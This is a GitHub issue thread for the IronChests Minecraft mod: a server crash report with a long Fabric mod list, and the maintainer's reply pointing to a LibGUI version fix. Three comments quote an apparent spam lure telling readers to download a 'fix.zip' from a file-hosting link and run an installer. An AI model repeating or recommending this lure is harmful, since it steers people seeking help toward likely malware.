### ISSUE TITLE
Opening any chest from the mod crashes the server

### ISSUE THREAD

**Issue by kiictus** [4nner/IronChests#74]
This started happening when I migrated the world to another server.
Here's a crash report:
```
---- Minecraft Crash Report ----
// My bad.

Time: 2024-08-23 12:50:02
Description: Exception in server tick loop

java.lang.NoSuchFieldError: Class io.github.cottonmc.cotton.gui.widget.WPanel does not have member field 'io.github.cottonmc.cotton.gui.client.BackgroundPainter backgroundPainter'
	at io.github.cottonmc.cotton.gui.widget.WPanel.<init>(WPanel.java:28)
	at io.github.cottonmc.cotton.gui.widget.WPanelWithInsets.<init>(WPanelWithInsets.java:12)
	at io.github.cottonmc.cotton.gui.widget.WGridPanel.<init>(WGridPanel.java:18)
	at io.github.cottonmc.cotton.gui.SyncedGuiDescription.<init>(SyncedGuiDescription.java:54)
	at io.github.cyberanner.ironchests.screenhandlers.ChestScreenHandler.<init>(ChestScreenHandler.java:18)
	at io.github.cyberanner.ironchests.blocks.blockentities.GenericChestEntity.method_5465(GenericChestEntity.java:41)
	at net.minecraft.class_2621.createMenu(class_2621.java:161)
	at net.minecraft.class_3222.method_17355(class_3222.java:1040)
	at net.minecraft.class_2281.method_9534(class_2281.java:207)
	at net.minecraft.class_4970$class_4971.method_26174(class_4970.java:964)
	at net.minecraft.class_3225.method_14262(class_3225.java:338)
	at net.minecraft.class_3244.method_12046(class_3244.java:1145)
	at net.minecraft.class_2885.method_12547(class_2885.java:34)
	at net.minecraft.class_2885.method_11054(class_2885.java:8)
	at net.minecraft.class_2600.method_11072(class_2600.java:22)
	at net.minecraft.class_3738.run(class_3738.java:18)
	at net.minecraft.class_1255.method_18859(class_1255.java:157)
	at net.minecraft.class_4093.method_18859(class_4093.java:23)
	at net.minecraft.server.MinecraftServer.method_24306(MinecraftServer.java:776)
	at net.minecraft.server.MinecraftServer.method_18859(MinecraftServer.java:159)
	at net.minecraft.class_1255.method_16075(class_1255.java:131)
	at net.minecraft.server.MinecraftServer.method_20415(MinecraftServer.java:758)
	at net.minecraft.server.MinecraftServer.method_16075(MinecraftServer.java:752)
	at net.minecraft.class_1255.method_18857(class_1255.java:140)
	at net.minecraft.server.MinecraftServer.method_16208(MinecraftServer.java:737)
	at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java:669)
	at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:257)
	at java.base/java.lang.Thread.run(Thread.java:1583)


A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- System Details --
Details:
	Minecraft Version: 1.19.2
	Minecraft Version ID: 1.19.2
	Operating System: Linux (aarch64) version 6.5.0-1025-oracle
	Java Version: 21.0.3, Eclipse Adoptium
	Java VM Version: OpenJDK 64-Bit Server VM (mixed mode, sharing), Eclipse Adoptium
	Memory: 1144603944 bytes (1091 MiB) / 3099590656 bytes (2956 MiB) up to 6442450944 bytes (6144 MiB)
	CPUs: 4
	Processor Vendor: aarch64
	Processor Name: 
	Identifier: aarch64 Family 8 Model 0xd0c Stepping r0x3p1
	Microarchitecture: unknown
	Frequency (GHz): -0.00
	Number of physical packages: 1
	Number of physical CPUs: 1
	Number of logical CPUs: 4
	Graphics card #0 name: unknown
	Graphics card #0 vendor: unknown
	Graphics card #0 VRAM (MB): 0.00
	Graphics card #0 deviceId: unknown
	Graphics card #0 versionInfo: unknown
	Virtual memory max (MB): 11990.89
	Virtual memory used (MB): 4655.79
	Swap memory total (MB): 0.00
	Swap memory used (MB): 0.00
	JVM Flags: 1 total; -Xmx6144M
	Fabric Mods: 
		agape_space: Space Dimensions 0.5.22
		another_furniture: Another Furniture 2.1.2-1.19.2
		architectury: Architectury 6.5.85
		backpackmod: Backpack Mod 4.0.5
		badpackets: Bad Packets 0.2.1
		bookshelf: Bookshelf 16.2.17
		botanypots: BotanyPots 9.0.27
		capybara: Capybara 2.0.1
		chiselsandbits: chisels-and-bits 1.3.146
			org_lz4_lz4-pure-java: lz4-pure-java 1.8.0
			saeculariacaudices: Saecularia Caudices 1.0.16
			scena: Scena 1.0.95
		clithuanian_kitchen: clithuanian_kitchen 1.0.0
		cloth-config: Cloth Config v8 8.2.88
			cloth-basic-math: cloth-basic-math 0.6.1
		collective: Collective 6.45
		croptopia: Croptopia 2.2.2
			com_typesafe_config: config 1.4.1
			io_leangen_geantyref_geantyref: geantyref 1.3.11
			org_spongepowered_configurate-core: configurate-core 4.1.2
			org_spongepowered_configurate-hocon: configurate-hocon 4.1.2
		davespotioneering: Dave's Potioneering fabric-1.19.2-1.4.2
			cloth-client-events-v0: Cloth Client Events v0 4.0.65
		dcintegration-fabric: Discord Integration Fabric 2.5.0
			de_erdbeerbaerlp_dcintegration_common: dcintegration.common 2.5.0
			placeholder-api: Placeholder API 2.0.0-pre.1+1.19.2
		diamondrails: Diamond Rails 1.0.0
		duckling: Duckling 2.0.8
		easyauth: Easy Authentication Mod 3.0.0-14
			at_favre_lib_bcrypt: bcrypt 0.9.0
			at_favre_lib_bytes: bytes 1.5.0
			de_mkammerer_argon2-jvm: argon2-jvm 2.11
			de_mkammerer_argon2-jvm-nolibs: argon2-jvm-nolibs 2.11
			fabric-permissions-api-v0: fabric-permissions-api 0.1-SNAPSHOT
			mysql_mysql-connector-java: mysql-connector-java 8.0.29
			net_java_dev_jna_jna: jna 5.12.1
			org_iq80_leveldb_leveldb: leveldb 0.12
			org_iq80_leveldb_leveldb-api: leveldb-api 0.12
			org_mongodb_bson: bson 4.7.0
			org_mongodb_mongodb-driver-core: mongodb-driver-core 4.7.0
			org_mongodb_mongodb-driver-sync: mongodb-driver-sync 4.7.0
			server_translations_api: Server Translations API 1.4.16+1.19
				packet_tweaker: Packet Tweaker 0.3.0+1.18.2
		extraalchemy: Extra Alchemy 1.9.0
		eyemod: EyeMod 2.1.1
		fabric-api: Fabric API 0.76.0+1.19.2
			fabric-api-base: Fabric API Base 0.4.15+8f4e8eb390
			fabric-api-lookup-api-v1: Fabric API Lookup API (v1) 1.6.14+93d8cb8290
			fabric-biome-api-v1: Fabric Biome API (v1) 9.1.1+16f1e31390
			fabric-block-api-v1: Fabric Block API (v1) 1.0.2+e415d50e90
			fabric-command-api-v1: Fabric Command API (v1) 1.2.16+f71b366f90
			fabric-command-api-v2: Fabric Command API (v2) 2.2.1+413cbbc790
			fabric-commands-v0: Fabric Commands (v0) 0.2.33+df3654b390
			fabric-containers-v0: Fabric Containers (v0) 0.1.41+df3654b390
			fabric-content-registries-v0: Fabric Content Registries (v0) 3.5.2+7c6cd14d90
			fabric-convention-tags-v1: Fabric Convention Tags 1.3.0+4bc6e26290
			fabric-crash-report-info-v1: Fabric Crash Report Info (v1) 0.2.8+aeb40ebe90
			fabric-data-generation-api-v1: Fabric Data Generation API (v1) 5.3.8+413cbbc790
			fabric-dimensions-v1: Fabric Dimensions API (v1) 2.1.35+0d0f210290
			fabric-entity-events-v1: Fabric Entity Events (v1) 1.5.4+9244241690
			fabric-events-interaction-v0: Fabric Events Interaction (v0) 0.4.34+562bff6e90
			fabric-events-lifecycle-v0: Fabric Events Lifecycle (v0) 0.2.36+df3654b390
			fabric-game-rule-api-v1: Fabric Game Rule API (v1) 1.0.24+b6b6abb490
			fabric-item-api-v1: Fabric Item API (v1) 1.6.6+b7d1888890
			fabric-item-groups-v0: Fabric Item Groups (v0) 0.3.39+9244241690
			fabric-lifecycle-events-v1: Fabric Lifecycle Events (v1) 2.2.4+1b46dc7890
			fabric-loot-api-v2: Fabric Loot API (v2) 1.1.13+83a8659290
			fabric-loot-tables-v1: Fabric Loot Tables (v1) 1.1.16+9e7660c690
			fabric-message-api-v1: Fabric Message API (v1) 5.0.7+93d8cb8290
			fabric-mining-level-api-v1: Fabric Mining Level API (v1) 2.1.24+33fbc73890
			fabric-networking-api-v1: Fabric Networking API (v1) 1.2.11+10eb22f490
			fabric-networking-v0: Fabric Networking (v0) 0.3.28+df3654b390
			fabric-object-builder-api-v1: Fabric Object Builder API (v1) 4.2.2+d8ef690890
			fabric-particles-v1: Fabric Particles (v1) 1.0.14+4d0d570390
			fabric-recipe-api-v1: Fabric Recipe API (v1) 1.0.1+413cbbc790
			fabric-registry-sync-v0: Fabric Registry Sync (v0) 0.9.32+9244241690
			fabric-rendering-data-attachment-v1: Fabric Rendering Data Attachment (v1) 0.3.19+6e0787e690
			fabric-rendering-fluids-v1: Fabric Rendering Fluids (v1) 3.0.11+4d0d570390
			fabric-resource-conditions-api-v1: Fabric Resource Conditions API (v1) 2.1.2+aae9039d90
			fabric-resource-loader-v0: Fabric Resource Loader (v0) 0.8.4+edbdcddb90
			fabric-screen-handler-api-v1: Fabric Screen Handler API (v1) 1.3.7+1cc24b1b90
			fabric-transfer-api-v1: Fabric Transfer API (v1) 2.1.6+413cbbc790
			fabric-transitive-access-wideners-v1: Fabric Transitive Access Wideners (v1) 1.3.3+08b73de490
		fabricloader: Fabric Loader 0.15.11
			mixinextras: MixinExtras 0.3.5
		ferritecore: FerriteCore 5.0.3
		forgeconfigapiport: Forge Config API Port 4.2.11
			com_electronwill_night-config_core: core 3.6.5
			com_electronwill_night-config_toml: toml 3.6.5
		geckolib3: Geckolib 3.1.38
			com_eliotlash_mclib_mclib: mclib 20
		ironchests: Iron Chests 1.7.7
			libgui: LibGui 6.2.0+1.19
				jankson: Jankson 4.1.1+j1.2.1
					blue_endless_jankson: jankson 1.2.1
				libninepatch: LibNinePatch 1.1.0
		java: OpenJDK 64-Bit Server VM 21
		justoutdoorstuffs: Just Outdoor Stuffs 1.0.0
		lazydfu: LazyDFU 0.1.3
		lightmanscurrency: Lightman's Currency 1.19.2-1.0.0.9a
		lithium: Lithium 0.10.4
		megane: megane 8.4.2
			megane-api: megane-api 8.4.2
			megane-fabric-transfer: megane-fabric-transfer 8.4.2
			megane-reborn-energy: megane-reborn-energy 8.4.2
			megane-runtime: megane-runtime 8.4.2
			megane-vanilla: megane-vanilla 8.4.2
		minecraft: Minecraft 1.19.2
		modern_industrialization: Modern Industrialization 1.6.9
			magna: Magna 1.8.0-1.19
				omega-config: OmegaConfig 1.0.8
			playerabilitylib: Pal 1.6.0
			team_reborn_energy: Energy 2.2.0
		patchouli: Patchouli 1.19.2-77-FABRIC
			fiber: fiber 0.23.0-2
		pfm: Paladin's Furniture 1.1.1
		skinrestorer: Skin Restorer 1.2.1
		slide_show: Slideshow 1.19.2-1.0.2
		slideshow_proyector_recipe: slideshow proyector recipe 1.0.0
		smoothboot: Smooth Boot 1.19-1.7.1
		spanish_foods: Spanish Foods 1.0.0
		spark: spark 1.10.37
		theatrical: Theatrical 1.0.0-alpha.3-build.16+mc1.19.2
		treeharvester: Tree Harvester 7.1
		trinkets: Trinkets 3.4.2
		twilightforest: The Twilight Forest 4.2.335
			cardinal-components-base: Cardinal Components API (base) 5.0.1
			cardinal-components-entity: Cardinal Components API (entities) 5.0.1
			com_google_code_findbugs_jsr305: jsr305 3.0.2
			javax_annotation_javax_annotation-api: javax.annotation-api 1.3.2
			mm: Manningham Mills 2.3
			porting_lib: Porting Lib 2.1.727+1.19.2
				forge_tags: Porting Lib Tags 3.0
				porting_lib_accessors: Porting Lib Accessors 2.1.727+1.19.2
				porting_lib_attributes: Porting Lib Attributes 2.1.727+1.19.2
				porting_lib_base: Porting Lib Base 2.1.727+1.19.2
				porting_lib_common: Porting Lib Common 2.1.727+1.19.2
				porting_lib_constants: Porting Lib Constants 2.1.727+1.19.2
				porting_lib_entity: Porting Lib Entity 2.1.727+1.19.2
				porting_lib_extensions: Porting Lib Extensions 2.1.727+1.19.2
				porting_lib_fake_players: Porting Lib Fake Players 2.1.727+1.19.2
				porting_lib_lazy_registration: Porting Lib Lazy Register 2.1.727+1.19.2
				porting_lib_model_generators: Porting Lib Model Generators 2.1.727+1.19.2
				porting_lib_model_loader: Porting Lib Model Loader 2.1.727+1.19.2
				porting_lib_models: Porting Lib Models 2.1.727+1.19.2
				porting_lib_networking: Porting Lib Networking 2.1.727+1.19.2
				porting_lib_obj_loader: Porting Lib Obj Loader 2.1.727+1.19.2
				porting_lib_transfer: Porting Lib Transfer 2.1.727+1.19.2
				serialization_hooks: Serialization Hooks 0.3.26
			reach-entity-attributes: Reach Entity Attributes 2.3.0
		worldedit: WorldEdit 7.2.12+6240-87f4ae1
		wthit: wthit 5.16.2
	Server Running: true
	Player Count: 1 / 20; [class_3222['Kiictus'/281, l='ServerLevel[floptropicuh]', x=-374.46, y=103.00, z=518.99]]
	Data Packs: vanilla, Fabric Mods
	World Generation: Experimental
	Is Modded: Definitely; Server brand changed to 'fabric'
	Type: Dedicated Server (map_server.txt)
```

**Comment by kiictus** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

https://youtu.be/7TmvP5-jyP0?si=kYZ37M151JwjCWw9

**Comment by kiictus** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

https://youtu.be/7TmvP5-jyP0?si=kYZ37M151JwjCWw9

**Comment by kiictus** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

oh fadty will you shut up

**Comment by 4nner** [comment]
@kiictus Issue related to LibGUI. The new 2.0.3 version for MC 1.21.x fixes the issue.
